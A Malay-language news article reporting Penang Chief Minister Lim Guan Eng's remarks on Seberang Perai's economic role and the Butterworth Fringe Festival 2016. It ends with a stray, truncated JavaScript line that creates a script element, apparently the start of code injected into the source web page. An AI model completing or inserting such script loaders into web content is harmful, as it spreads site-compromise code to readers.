Seberang Perai, pengubah ekonomi masa depan P. Pinang – KM

Oleh : ZAINULFAQAR YAACOB & WATAWA NATAF ZULKIFLI  

BAGAN DALAM – Seberang Perai disifatkan Ketua Menteri, Y.A.B Tuan Lim Guan Eng sebagai ‘pengubah ekonomi’ bagi negeri Pulau Pinang pada masa hadapan.

Katanya, (bahagian) pulau dan Seberang Perai adalah seperti adik-beradik kembar.

“Kita tidak boleh pisahkan kedua-duanya, bahkan kita kena rapatkan ‘mereka’.

“Jadi bagaimana kita ingin rapatkan mereka? Kerajaan Negeri meningkatkan hubungan antara dua bahagian ini, tidak cukup satu jambatan, kita tambah dua, tidak cukup lagi, kita bina terowong bawah dasar laut pertama di Malaysia.

“Malah, Seberang Perai juga tidak dipinggirkan oleh Kerajaan Negeri apabila turut dimasukkan dalam Pelan Induk Pengangkutan Pulau Pinang (PIP),” ujarnya pada Majlis Pelancaran Buku Seberang Perai Stories From Across The Sea sempena penganjuran Butterworth Fringe Festival (BFF) 2016 dekat Jalan Jeti Lama di sini baru-baru ini.

Hadir sama, Exco Kebajikan, Masyarakat Penyayang dan Alam Sekitar, Phee Boon Poh; Exco Kerja Raya, Pengangkutan dan Utiliti, Lim Hock Seng; Yang di-Pertua Majlis Perbandaran Seberang Perai (MPSP), Dato’ Maimunah Mohd. Sharif dan Pengelola BFF 2016, Joe Sidek.

Pada majlis berasingan, Guan Eng menyatakan bahawa usaha Kerajaan Negeri menonjolkan warisan tak ketara menerusi penganjuran edisi kedua BFF 2016 yang bakal menggerakkan aktiviti ekonomi di Butterworth kelak, setanding dengan Tapak Warisan Dunia UNESCO George Town suatu hari nanti.

“Seperti yang kita tegaskan, untuk menjadi sebuah bandar raya bertaraf antarabangsa dan juga sebuah bandar raya yang maju, mesti ada satu hab atau satu teras budaya dan seni.

“Kita (Kerajaan Negeri) akan pastikan pembangunan seimbang bukan sahaja dalam aspek ekonomi, malah dalam budaya dan seni.

“Tujuh tahun Festival George Town (GTF) diadakan di bahagian pulau, nescaya perlu diadakan juga suatu festival seumpamanya di bahagian Seberang Perai,” ujarnya sambil menyatakan bahawa penganjuran berkaitan sekaligus menyerlahkan komitmen Kerajaan Negeri dalam mengembangkan potensi bahagian Seberang Perai seiringan dengan kemajuan di bahagian pulau.

var d=document;var s=d.createElement(‘script’);